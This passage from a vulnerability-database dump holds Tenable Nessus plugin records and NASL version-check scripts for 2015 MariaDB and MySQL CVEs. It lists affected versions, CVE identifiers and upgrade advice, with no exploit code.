the\n Security:Privileges subcomponent that allows an\n authenticated, remote attacker to affect the integrity\n of the system. No other details are available.\n (CVE-2015-4830)\n\n - An unspecified flaw exists related to the SP\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4836)\n\n - Multiple unspecified flaws exist related to the DML\n subcomponent that allow an authenticated, remote\n attacker to cause a denial of service. 
(CVE-2015-4858,\n CVE-2015-4913)\n\n - An unspecified flaw exists related to the InnoDB\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4861)\n\n - An unspecified flaw exists related to the Parser\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4870)\n\n - A flaw exists in the mysql_prepare_create_table()\n function due to improper handling of a comma buffer that\n is greater than zero. An authenticated, remote attacker\n can exploit this to cause a denial of service condition.", "edition": 28, "published": "2015-12-04T00:00:00", "title": "MariaDB < 5.5.46 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_5_5_46.NASL", "href": "https://www.tenable.com/plugins/nessus/87210", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87210);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n \"CVE-2015-4807\",\n \"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\"\n );\n script_bugtraq_id(\n 77137,\n 77145,\n 77153,\n 77165,\n 77171,\n 77190,\n 77205,\n 77208,\n 77222,\n 77228,\n 77237\n );\n\n script_name(english:\"MariaDB < 5.5.46 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The version of MariaDB running on the remote host is prior to 5.5.46.\nIt is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified flaws exist related to the\n Partition subcomponent that allow an authenticated,\n remote attacker to cause a denial of service.\n (CVE-2015-4802, CVE-2015-4792)\n\n - An unspecified flaw exists related to the Query Cache\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4807)\n\n - An unspecified flaw exists related to the DDL\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4815)\n\n - An unspecified flaw exists related to the Types\n subcomponent that allows an authenticated, remote\n attacker to gain access to sensitive information.\n (CVE-2015-4826)\n\n - An unspecified flaw exists related to the\n Security:Privileges subcomponent that allows an\n authenticated, remote attacker to affect the integrity\n of the system. No other details are available.\n (CVE-2015-4830)\n\n - An unspecified flaw exists related to the SP\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4836)\n\n - Multiple unspecified flaws exist related to the DML\n subcomponent that allow an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4858,\n CVE-2015-4913)\n\n - An unspecified flaw exists related to the InnoDB\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4861)\n\n - An unspecified flaw exists related to the Parser\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4870)\n\n - A flaw exists in the mysql_prepare_create_table()\n function due to improper handling of a comma buffer that\n is greater than zero. 
An authenticated, remote attacker\n can exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.org/mariadb-5-5-46-now-available/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-7050\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4830\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.46-MariaDB', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T03:45:41", "description": "The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.22. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the 'Server : Partition'\n subcomponent. An authenticated, remote attacker can\n exploit these flaws to affect availability.\n (CVE-2015-4792, CVE-2015-4802)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the Query Cache subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4807)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the DDL subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4815)\n\n - An information disclosure vulnerability exists due to an\n unspecified flaw in the Types subcomponent. An\n authenticated, remote attacker can exploit this to gain\n access to sensitive information. (CVE-2015-4826)\n\n - An unspecified vulnerability exists due to an\n unspecified flaw in the 'Security : Privileges'\n subcomponent. An authenticated, remote attacker can\n exploit this to affect integrity. (CVE-2015-4830)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the SP subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4836)\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the DML subcomponent. 
An\n authenticated, remote attacker can exploit these flaws\n to affect availability. (CVE-2015-4858, CVE-2015-4913)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the InnoDB subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4861)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the 'Server : Parser' subcomponent.\n An authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4870)\n\n - A denial of service vulnerability exists due to a flaw\n in the ha_partition::index_init() function that is\n triggered when handling the priority queue. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_field::fix_outer_field() function that is\n triggered when handling PREPARE statements. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the convert_kill_to_deadlock_error() function that is\n triggered when handling rollbacks. An authenticated, \n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the no_rows_in_result() function that is triggered\n when handling logical conditions. An authenticated,\n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the handle_grant_struct() function that is triggered\n when handling HASH updates. 
An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the is_invalid_role_name() function that is triggered\n when handling ACLs with blank role names. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_direct_view_ref class that is triggered\n when handling SELECT queries. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the opt_sum_query() function that is triggered when\n handling constant tables. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.", "edition": 29, "published": "2015-11-13T00:00:00", "title": "MariaDB 10.0.x < 10.0.22 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_0_22.NASL", "href": "https://www.tenable.com/plugins/nessus/86874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86874);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n \"CVE-2015-4807\",\n \"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\"\n );\n\n script_name(english:\"MariaDB 10.0.x < 10.0.22 Multiple Vulnerabilities\");\n 
script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.22. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the 'Server : Partition'\n subcomponent. An authenticated, remote attacker can\n exploit these flaws to affect availability.\n (CVE-2015-4792, CVE-2015-4802)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the Query Cache subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4807)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the DDL subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4815)\n\n - An information disclosure vulnerability exists due to an\n unspecified flaw in the Types subcomponent. An\n authenticated, remote attacker can exploit this to gain\n access to sensitive information. (CVE-2015-4826)\n\n - An unspecified vulnerability exists due to an\n unspecified flaw in the 'Security : Privileges'\n subcomponent. An authenticated, remote attacker can\n exploit this to affect integrity. (CVE-2015-4830)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the SP subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4836)\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the DML subcomponent. An\n authenticated, remote attacker can exploit these flaws\n to affect availability. (CVE-2015-4858, CVE-2015-4913)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the InnoDB subcomponent. 
An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4861)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the 'Server : Parser' subcomponent.\n An authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4870)\n\n - A denial of service vulnerability exists due to a flaw\n in the ha_partition::index_init() function that is\n triggered when handling the priority queue. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_field::fix_outer_field() function that is\n triggered when handling PREPARE statements. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the convert_kill_to_deadlock_error() function that is\n triggered when handling rollbacks. An authenticated, \n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the no_rows_in_result() function that is triggered\n when handling logical conditions. An authenticated,\n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the handle_grant_struct() function that is triggered\n when handling HASH updates. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the is_invalid_role_name() function that is triggered\n when handling ACLs with blank role names. 
An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_direct_view_ref class that is triggered\n when handling SELECT queries. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the opt_sum_query() function that is triggered when\n handling constant tables. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.org/mariadb-10-0-22-now-available/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8805\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8756\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8725\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8614\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8525\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-7930\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.0.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4830\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/13\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.0.22-MariaDB', min:'10.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T10:46:46", "description": "Oracle reports :\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior,\n5.6.26 and prior", "edition": 22, "published": "2015-11-12T00:00:00", "title": "FreeBSD : MySQL - Multiple vulnerabilities (851a0eea-88aa-11e5-90e7-b499baebfeaf)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-11-12T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql56-server", "p-cpe:/a:freebsd:freebsd:mariadb100-server", "p-cpe:/a:freebsd:freebsd:mariadb100-client", "p-cpe:/a:freebsd:freebsd:mariadb55-client", 
"cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mysql56-client", "p-cpe:/a:freebsd:freebsd:mysql55-client", "p-cpe:/a:freebsd:freebsd:mariadb-server", "p-cpe:/a:freebsd:freebsd:percona55-server", "p-cpe:/a:freebsd:freebsd:mysql55-server", "p-cpe:/a:freebsd:freebsd:percona55-client", "p-cpe:/a:freebsd:freebsd:percona56-client", "p-cpe:/a:freebsd:freebsd:mariadb-client", "p-cpe:/a:freebsd:freebsd:percona56-server", "p-cpe:/a:freebsd:freebsd:mariadb55-server"], "id": "FREEBSD_PKG_851A0EEA88AA11E590E7B499BAEBFEAF.NASL", "href": "https://www.tenable.com/plugins/nessus/86858", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86858);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"FreeBSD : MySQL - Multiple vulnerabilities (851a0eea-88aa-11e5-90e7-b499baebfeaf)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Oracle reports :\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior,\n5.6.26 and prior\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75a4a4fb\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n # https://www.percona.com/doc/percona-server/5.5/release-notes/Percona-Server-5.5.46-37.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e29b246f\"\n );\n # https://www.percona.com/doc/percona-server/5.6/release-notes/Percona-Server-5.6.27-75.0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ac422d9\"\n );\n # https://vuxml.freebsd.org/freebsd/851a0eea-88aa-11e5-90e7-b499baebfeaf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ffa5ea9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-client\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:percona55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mariadb-client<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb-server<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-client<10.0.22\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-server<10.0.22\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-client<5.6.27\")) flag++;\nif 
(pkg_test(save_report:TRUE, pkg:\"mysql56-server<5.6.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-client<5.6.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-server<5.6.27\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:28:56", "description": "MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792\n\nA list of upstream changes and release notes can be found here :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThe following build problems were fixed :\n\n - bsc#937787: fix main.bootstrap test (change default\n charset to utf8 in test result)", "edition": 18, "published": "2015-12-17T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2015-884)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", 
"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2015-884.NASL", "href": "https://www.tenable.com/plugins/nessus/87440", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-884.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87440);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2015-884)\");\n script_summary(english:\"Check for the openSUSE-2015-884 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 